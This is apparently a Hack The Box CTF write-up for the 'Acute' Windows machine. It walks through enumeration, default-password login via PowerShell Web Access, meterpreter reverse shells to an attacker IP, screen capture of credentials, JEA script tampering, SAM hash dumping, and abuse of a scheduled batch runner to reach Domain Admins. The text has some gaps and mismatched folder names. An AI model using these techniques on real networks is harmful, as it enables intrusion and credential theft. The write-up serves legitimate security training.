Acute is a hard Windows machine that starts with a website on port 443. The certificate of the website reveals a domain name atsserver.acute.local. Looking around the website there are several employees mentioned and with this information it is possible to construct a list of possible users on the remote machine. Enumerating the website reveals a form with procedures regarding newcomers to the company. The form reveals the default password that all accounts are initially set up with. It also reveals a link for a Windows PowerShell Web Access (PSWA) session. Combining all the available information from the enumeration process an attacker is able to get into a PowerShell session as the user edavies on Acute-PC01. Then, it is discovered that the user edavies is also logged on using an interactive session. Upon spying on the actions of edavie the clear text password of the imonks user for ATSSERVER can be retrieved. The user imonks is running under Just Enough Administration (JEA) on ATSSERVER, but even with the limited command set an attacker is able to modify a script on ATSSERVER in order to make edavies a local administrator on Acute-PC01. Now that edavies is a local administrator the HKLM\sam and HKLM\system can be retrieved from the system in order to extract the password hashes of all the users. The administrator hash turns out to be crackable and the clear text password is re-used for awallace on ATSSERVER. The user awallace is able to create BAT scripts on a directory where the user Lois will execute them. Lois has the rights to add imonks to the site_admin group which in turn has right access to the Domain Admins group. So, after imonks is added to the site_admin group he can add himself to the Domain Admins group and acquire administrative privileges.
Enumeration
Scope
IP Address: 10.10.11.145
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn
PORT STATE SERVICE
443/tcp open https
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel2]
└─$ nmap -p -sCV $ip -oN Nmap/script-scan
PORT STATE SERVICE VERSION
443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
| ssl-cert: Subject: commonName=atsserver.acute.local
| Subject Alternative Name: DNS:atsserver.acute.local, DNS:atsserver
| Not valid before: 2022-01-06T06:34:58
|_Not valid after: 2030-01-04T06:34:58
|_ssl-date: 2024-07-22T08:03:32+00:00; 0s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn:
|_ http/1.1
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
* Open ports: 443
* Services: HTTPS
* Important notes: DNS:atsserver.acute.local, DNS:atsserver
First, I added the domain name, FQDN and computer name to hosts file
Several users found but I need to know the format of each user.
In the top right of the page, there is a link to .docx file
When I clicked it, It downloaded the file to my kali machine, So I will explore it locally.
Looking at the file details:
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Acute]
└─$ exiftool New_Starter_CheckList_v7.docx
<snip>
Zip File Name : [Content_Types].xml
Creator : FCastle
Description : Created on Acute-PC01
Last Modified By : Daniel
<snip>
The Creator of the file is Fcastle which is not in my users list, So I will add him first along with Daniel by whom the file was modified. Also, it gave us a hint that the username format is First Letter from first name + Last name So the user list should be like this:
This raw tells that the default password is Password1! and several users have this passwords
PSWA means PowerShell Web Access and dc_manage seems to be kind of restrictions or something.
The last raw has a link when clicked it, it takes me to https://atsserver.acute.local/Acute_Staff_Access
At the end, I can see that there is a group with name site admin and Lois has control of it.
Shell ad Edavies
https://atsserver.acute.local/Acute_Staff_Access
It's a PowerShell web Access Console, I have the password, two computer names and several users. I will try them.
When providing wrong credentials, this message appears
A new message appears with user Chall says that we aren't authorized to connect to that computer name, So I will try the other one.
When I changed the computer name to Acute-PC01 and try to authenticate with chall, it also failed However, when tried with Edavies it took me to the PowerShell Console.
Jmorgan & Natasha exists on the machine along with edavies.
PS C:\Users> dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/21/2021 1:01 PM administrator.ACUTE
d----- 12/22/2021 1:26 AM edavies
d----- 12/21/2021 10:50 PM jmorgan
d----- 11/19/2021 9:29 AM Natasha
d-r--- 11/18/2020 11:43 PM Public
PS C:\Users> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==============================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled g
roup
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled g
roup
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled g
roup
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled g
roup
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled g
roup
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled g
roup
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled g
roup
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
I want to see who is a member on Remote Managment users but when asked the domain it failed, So I switch to query local group and got a result
PS C:\Users> net group "Remote Management Users"
net : This command can be used only on a Windows Domain Controller.
+ CategoryInfo : NotSpecified: (This command ca...ain Controller.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
More help is available by typing NET HELPMSG 3515.
PS C:\Users> net localgroup "Remote Management Users"
Members
-------------------------------------------------------------------------------
ACUTE\edavies
The command completed successfully.
I also looked at administrators group and I found that Jmorgan is a member of it.
PS C:\Users> net localgroup "administrators"
Members
-------------------------------------------------------------------------------
ACUTE\Domain Admins
ACUTE\jmorgan
Administrator
I need to upgrade my shell, So I can use nc or meterpreter shell. In our situation, meterpreter shell is better and we will know why after few steps.
At root file system, there is a non-standard folder Utils
PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/7/2019 9:14 AM PerfLogs
d-r--- 12/6/2021 11:06 AM Program Files
d-r--- 12/7/2021 12:43 PM Program Files (x86)
d-r--- 12/21/2021 10:50 PM Users
d----- 1/31/2022 12:29 AM Utils
d----- 12/16/2021 1:23 AM Windows
Viewing the folder permission, I found the edavies has (M) modify permission which means he can Read, Wirte, Execute, Delete.
PS C:\> icacls Utils
Utils NT AUTHORITY\SYSTEM:(OI)(CI)(F)
BUILTIN\Administrators:(OI)(CI)(F)
ACUTE\edavies:(OI)(CI)(M)
BUILTIN\Users:(OI)(CI)(R)
I don't know why this folder exists but I will continue from this folder as I have permissions on it.
[*] Sending stage (201798 bytes) to 10.10.11.145
[*] Meterpreter session 1 opened (10.10.16.7:443 -> 10.10.11.145:49848) at 2024-07-22 05:06:10 -0400
meterpreter > getuid
Server username: ACUTE\edavies
Shell as imonks
Personally, I didn't know what to do next as no escalation path was clear to me, So I got a hint that you can use screenshare feature from meterpreter session to capture desktop screenshot.
I couldn't run the script as it as Edavies because he isn't the user that creates this file, So I will try to run the script as imonks to get a shell as jmorgan.
But first I will modify this script to send me a shell.
Creating meterpreter shell to receive connection as jmorgan
msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.16.7:8443
msf6 exploit(multi/handler) > jobs
Id Name Payload Payload opts
-- ---- ------- ------------
0 Exploit: multi/handler windows/x64/meterpreter/reverse_tcp tcp://10.10.16.7:8443
I want to modify the wm.ps1 script, So I typed Get-Commnad to see available commands I can run
PS C:\Utils> Invoke-Command -Credential $cred -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {Get-Command}
CommandType Name Version Source PSComputerName
----------- ---- ------- ------ --------------
Cmdlet Get-Alias 3.1.0.0 Microsoft.PowerSh... atsserver
Cmdlet Get-ChildItem 3.1.0.0 Microsoft.PowerSh... atsserver
Cmdlet Get-Command 3.0.0.0 Microsoft.PowerSh... atsserver
Cmdlet Get-Content 3.1.0.0 Microsoft.PowerSh... atsserver
Cmdlet Get-Location 3.1.0.0 Microsoft.PowerSh... atsserver
Cmdlet Set-Content 3.1.0.0 Microsoft.PowerSh... atsserver
Cmdlet Set-Location 3.1.0.0 Microsoft.PowerSh... atsserver
Cmdlet Write-Output 3.1.0.0 Microsoft.PowerSh... atsserver
PS C:\Utils> Invoke-Command -Credential $cred -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {Get-Alias}
CommandType Name Version Source PSComputerName
----------- ---- ------- ------ --------------
Alias cat -> Get-Content atsserver
Alias cd -> Set-Location atsserver
Alias echo -> Write-Output atsserver
Alias ls -> Get-ChildItem atsserver
Alias pwd -> Get-Location atsserver
Alias sc -> Set-Content atsserver
Alias type -> Get-Content atsserver
I will use Set-Content to add the following lines to the script
Invoke-Command -Credential $cred -ComputerName atsserver -ConfigurationName dc_manage -ScriptBlock {C:\Users\imonks\Desktop\wm.ps1}
[*] Sending stage (201798 bytes) to 10.10.11.145
[*] Meterpreter session 2 opened (10.10.16.7:8443 -> 10.10.11.145:49786) at 2024-07-22 06:04:23 -0400
msf6 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows ACUTE\edavies @ ACUTE-PC01 10.10.16.7:443 -> 10.10.11.145:49848 (172.16.22.2)
2 meterpreter x64/windows ACUTE\jmorgan @ ACUTE-PC01 10.10.16.7:8443 -> 10.10.11.145:49786 (172.16.22.2)
msf6 exploit(multi/handler) > sessions 2
[*] Starting interaction with 2...
meterpreter > getuid
Server username: ACUTE\jmorgan
PS C:\Users\jmorgan\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
Shell as awallace
I will use hashdump feature to dump hashes and try to crack it
PS C:\Utils> Invoke-Command -Credential $credential -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {cat "C:\Program Files\keepmeon\keepmeon.bat"}
REM This is run every 5 minutes. For Lois use ONLY
@echo off
for /R %%x in (*.bat) do (
if not "%%x" == "%~0" call "%%x"
)
Asking ChatGPT about the exact function of that script:
So, I can create .bat file and get it executed after 5 minutes as Lois the comment says. We also saw that Lois is the only user who can add members to Site_admin groups, So I will add jmorgan to that groups and get Domain Admins privileges
The comment field says that the site_admin group has access to domain admins
PS C:Utils> Invoke-Command -Credential $credential -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {net group site_admin}
Group name Site_Admin
Comment Only in the event of emergencies is this to be populated. This has access to Domain Admin group
Members
-------------------------------------------------------------------------------
The command completed successfully.
Invoke-Command -Credential $credential -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {net group site_admin}
Group name Site_Admin
Comment Only in the event of emergencies is this to be populated. This has access to Domain Admin group
Members
-------------------------------------------------------------------------------
awallace
The command completed successfully.
